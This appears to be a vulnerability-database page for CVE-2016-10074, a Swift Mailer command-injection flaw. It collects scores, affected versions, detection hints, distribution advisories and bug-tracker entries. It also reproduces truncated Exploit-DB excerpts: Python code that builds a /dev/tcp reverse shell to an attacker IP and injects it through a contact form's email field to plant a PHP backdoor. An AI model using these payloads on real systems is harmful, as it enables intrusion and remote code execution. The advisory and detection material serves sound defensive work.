CVE-2016-10074
published 2016-12-30CVE-2016-10074: The mail transport (aka Swift_Transport_MailTransport) in Swift Mailer before 5.4.5 might allow remote attackers to pass extra parameters to the mail command…
PriorityP274critical9.8CVSS 3.0
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
41.83%
98.5th percentile
The mail transport (aka Swift_Transport_MailTransport) in Swift Mailer before 5.4.5 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code via a \" (backslash double quote) in a crafted e-mail address in the (1) From, (2) ReturnPath, or (3) Sender header.
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | libphp-swiftmailer | < libphp-swiftmailer 5.4.2-1.1 (bookworm) | libphp-swiftmailer 5.4.2-1.1 (bookworm) |
| neos | swiftmailer | >= 0 < 5.4.5 | 5.4.5 |
| swiftmailer | swiftmailer | <= 5.4.4 | — |
| swiftmailer | swiftmailer | >= 0 < 5.4.5 | 5.4.5 |
Detection & IOCsextracted from sources · hover to see the quote
- →Detect parameter injection in Swift Mailer by monitoring for backslash double-quote sequences (\" ) in the From, ReturnPath, or Sender email header fields, which are used to escape out of the mail() command argument and inject extra parameters. ↗
- →Monitor outbound /dev/tcp shell connections spawned from web server processes (e.g., apache, php-fpm), which are indicative of successful exploitation resulting in a reverse shell. ↗
- →Alert on Swift_Transport_MailTransport processing email addresses containing -be or other mail command flags, as these indicate attempted parameter injection via the From/ReturnPath/Sender headers. ↗
- ·The vulnerability only affects Swift Mailer versions before 5.4.5; upgrading to 5.4.5 or later fully remediates the issue. Detection rules targeting older versions should be scoped accordingly. ↗
- ·The exploit targets the PHP mail() function's fifth argument (-f flag) via Swift_Transport_MailTransport; environments using SMTP transport instead of the mail() transport are not affected by this specific attack vector. ↗
CVSS provenance
nvdv3.09.8CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
ghsa9.8CRITICAL
osv9.8CRITICAL
vendor_debian9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Debian
CVE-2016-10074: libphp-swiftmailer - The mail transport (aka Swift_Transport_MailTransport) in Swift Mailer before 5....
vendor_debian·2016·CVSS 9.8
CVE-2016-10074 [CRITICAL] CVE-2016-10074: libphp-swiftmailer - The mail transport (aka Swift_Transport_MailTransport) in Swift Mailer before 5....
The mail transport (aka Swift_Transport_MailTransport) in Swift Mailer before 5.4.5 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code via a \" (backslash double quote) in a crafted e-mail address in the (1) From, (2) ReturnPath, or (3) Sender header.
Scope: local
bookworm: resolved (fixed in 5.4.2-1.1)
bullseye: resolved (fixed in 5.4.2-1.1)
forky: resolved (fixed in 5.4.2-1.1)
sid: resolved (fixed in 5.4.2-1.1)
GHSA
Flow Swift Mailer package Remote code execution
ghsa·2024-05-17·CVSS 9.8
CVE-2016-10074 [CRITICAL] Flow Swift Mailer package Remote code execution
Flow Swift Mailer package Remote code execution
A remote code execution vulnerability has been found in the Swift Mailer library (swiftmailer/swiftmailer) recently. [See this advisory for details](http://legalhackers.com/advisories/SwiftMailer-Exploit-Remote-Code-Exec-CVE-2016-10074-Vuln.html). If you are not using the default mail() transport, this particular problem does not affect you. Upgrading is of course still recommended!
OSV
Flow Swift Mailer package Remote code execution
osv·2024-05-17·CVSS 9.8
CVE-2016-10074 [CRITICAL] Flow Swift Mailer package Remote code execution
Flow Swift Mailer package Remote code execution
A remote code execution vulnerability has been found in the Swift Mailer library (swiftmailer/swiftmailer) recently. [See this advisory for details](http://legalhackers.com/advisories/SwiftMailer-Exploit-Remote-Code-Exec-CVE-2016-10074-Vuln.html). If you are not using the default mail() transport, this particular problem does not affect you. Upgrading is of course still recommended!
OSV
Swift Mailer mail transport Command Injection
osv·2022-05-17
CVE-2016-10074 [CRITICAL] Swift Mailer mail transport Command Injection
Swift Mailer mail transport Command Injection
The mail transport (aka Swift_Transport_MailTransport) in Swift Mailer before 5.4.5 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code via a \" (backslash double quote) in a crafted e-mail address in the (1) From, (2) ReturnPath, or (3) Sender header.
GHSA
Swift Mailer mail transport Command Injection
ghsa·2022-05-17
CVE-2016-10074 [CRITICAL] CWE-77 Swift Mailer mail transport Command Injection
Swift Mailer mail transport Command Injection
The mail transport (aka Swift_Transport_MailTransport) in Swift Mailer before 5.4.5 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code via a \" (backslash double quote) in a crafted e-mail address in the (1) From, (2) ReturnPath, or (3) Sender header.
OSV
CVE-2016-10074: The mail transport (aka Swift_Transport_MailTransport) in Swift Mailer before 5
osv·2016-12-30·CVSS 9.8
CVE-2016-10074 [CRITICAL] CVE-2016-10074: The mail transport (aka Swift_Transport_MailTransport) in Swift Mailer before 5
The mail transport (aka Swift_Transport_MailTransport) in Swift Mailer before 5.4.5 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code via a \" (backslash double quote) in a crafted e-mail address in the (1) From, (2) ReturnPath, or (3) Sender header.
No detection rules found.
Exploit-DB
PHPMailer < 5.2.20 with Exim MTA - Remote Code Execution
exploitdb·2017-06-21·CVSS 9.8
CVE-2016-10074 [CRITICAL] PHPMailer < 5.2.20 with Exim MTA - Remote Code Execution
PHPMailer 2):
print "No such target. Exiting\n"
exit(3)
################################
# Payload
################################
cmd = "/bin/bash -c '0/dev/tcp/%s/%s;nohup sh &196 2>&196 &'" % (args.ATTACKER_IP, args.ATTACKER_PORT)
prepared_cmd = prepare_cmd(cmd)
payload = '"a\\" -be ' + prepared_cmd + ' "@a.co'
# Update payloads for PHPMailer bypass (PHPMailer < 5.2.20)
if target == 2:
payload = "\"a\\' -be " + prepared_cmd + " \"@a.co"
################################
# Attack episode
# This step will execute the reverse shell
################################
# Form fields
post_fields = {'action': "%s" % args.POST_ACTION, "%s" % args.POST_NAME: 'Jas Fasola', "%s" % args.POST_EMAIL: payload, "%s" % args.POST_MSG: 'Really important message'}
# Print relevant information
print "\n[
Exploit-DB
PHPMailer < 5.2.20 / SwiftMailer < 5.4.5-DEV / Zend Framework / zend-mail < 2.4.11 - 'AIO' 'PwnScriptum' Remote Code Execution
exploitdb·2017-01-02·CVSS 9.8
CVE-2016-10074 [CRITICAL] PHPMailer < 5.2.20 / SwiftMailer < 5.4.5-DEV / Zend Framework / zend-mail < 2.4.11 - 'AIO' 'PwnScriptum' Remote Code Execution
PHPMailer 4):
print "No such target. Exiting\n"
exit(3)
if target == 1:
# PHPMailer "
RCE_PHP_CODE = """/dev/tcp/%s/%s 0&1' "); ?>""" % (TMOUT, args.ATTACKERS_IP, args.ATTACKERS_PORT)
# The form names might need to be adjusted
post_fields = {'action': "%s" % args.POST_ACTION, "%s" % args.POST_NAME: 'Jas Fasola', "%s" % args.POST_EMAIL: payload, "%s" % args.POST_MSG: RCE_PHP_CODE}
# Attack
# Inject payload into PHPMailer / mail() via a Contact form. This should write out the backdoor
print "[+] Backdoor upload via the contact form at '%s'\n" % CONTACT_SCRIPT_URL
data = urllib.urlencode(post_fields)
req = urllib2.Request(CONTACT_SCRIPT_URL, data)
response = urllib2.urlopen(req)
the_page = response.read()
# Check if the backdoor was uploaded correctly.
# A little trick here. The urlopen s
Exploit-DB
SwiftMailer < 5.4.5-DEV - Remote Code Execution
exploitdb·2016-12-28·CVSS 9.8
CVE-2016-10074 [CRITICAL] SwiftMailer < 5.4.5-DEV - Remote Code Execution
SwiftMailer
09607 setFrom(array($email_from => 'PoC Exploit Payload'))
->setTo(array('[email protected]', '[email protected]' => 'A name'))
->setBody('Here is the message itself')
;
// Send the message with PoC payload in 'from' field
$result = $mailer->send($message);
?>
Bugzilla
CVE-2016-10074 php-swiftmailer: Parameter injection via mail() function
bugzilla·2017-01-02·CVSS 9.8
CVE-2016-10074 [CRITICAL] CVE-2016-10074 php-swiftmailer: Parameter injection via mail() function
CVE-2016-10074 php-swiftmailer: Parameter injection via mail() function
A vulnerability was found in swiftmailer. A remote code execution could be achieved by passing a maliciously crafted expression to the vulnerable application.
References:
http://seclists.org/oss-sec/2016/q4/774
https://legalhackers.com/advisories/SwiftMailer-Exploit-Remote-Code-Exec-CVE-2016-10074-Vuln.html
Discussion:
Created php-swiftmailer tracking bugs for this issue:
Affects: fedora-all [bug 1409518]
Affects: epel-7 [bug 1409519]
---
This CVE Bugzilla entry is for community support informational purposes only as it does not affect a package in a commercially supported Red Hat product. Refer to the dependent bugs for status of those individual community products.
Bugzilla
CVE-2016-10074 php-swiftmailer: Parameter injection via mail() function [fedora-all]
bugzilla·2017-01-02·CVSS 9.8
CVE-2016-10074 [CRITICAL] CVE-2016-10074 php-swiftmailer: Parameter injection via mail() function [fedora-all]
CVE-2016-10074 php-swiftmailer: Parameter injection via mail() function [fedora-all]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected versions
of Fedora.
For comments that are specific to the vulnerability please use bugs filed
against the "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When submitting as an update, use the fedpkg template provided in the next
comment(s). This will include the bug IDs of this tracking bug as well as
the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the
fedpkg commit message.
NOTE: this issue affects multiple supported versi
Bugzilla
CVE-2016-10074 php-swiftmailer: Parameter injection via mail() function [epel-7]
bugzilla·2017-01-02·CVSS 9.8
CVE-2016-10074 [CRITICAL] CVE-2016-10074 php-swiftmailer: Parameter injection via mail() function [epel-7]
CVE-2016-10074 php-swiftmailer: Parameter injection via mail() function [epel-7]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected versions
of Fedora EPEL.
For comments that are specific to the vulnerability please use bugs filed
against the "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When submitting as an update, use the fedpkg template provided in the next
comment(s). This will include the bug IDs of this tracking bug as well as
the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the
fedpkg commit message.
[bug automatically created by: add-tracking-bugs
http://packetstormsecurity.com/files/140290/SwiftMailer-Remote-Code-Execution.htmlhttp://seclists.org/fulldisclosure/2016/Dec/86http://www.debian.org/security/2017/dsa-3769http://www.securityfocus.com/bid/95140https://github.com/swiftmailer/swiftmailer/blob/5.x/CHANGEShttps://legalhackers.com/advisories/SwiftMailer-Exploit-Remote-Code-Exec-CVE-2016-10074-Vuln.htmlhttps://www.exploit-db.com/exploits/40972/https://www.exploit-db.com/exploits/40986/https://www.exploit-db.com/exploits/42221/http://packetstormsecurity.com/files/140290/SwiftMailer-Remote-Code-Execution.htmlhttp://seclists.org/fulldisclosure/2016/Dec/86http://www.debian.org/security/2017/dsa-3769http://www.securityfocus.com/bid/95140https://github.com/swiftmailer/swiftmailer/blob/5.x/CHANGEShttps://legalhackers.com/advisories/SwiftMailer-Exploit-Remote-Code-Exec-CVE-2016-10074-Vuln.htmlhttps://www.exploit-db.com/exploits/40972/https://www.exploit-db.com/exploits/40986/https://www.exploit-db.com/exploits/42221/
2016-12-30
Published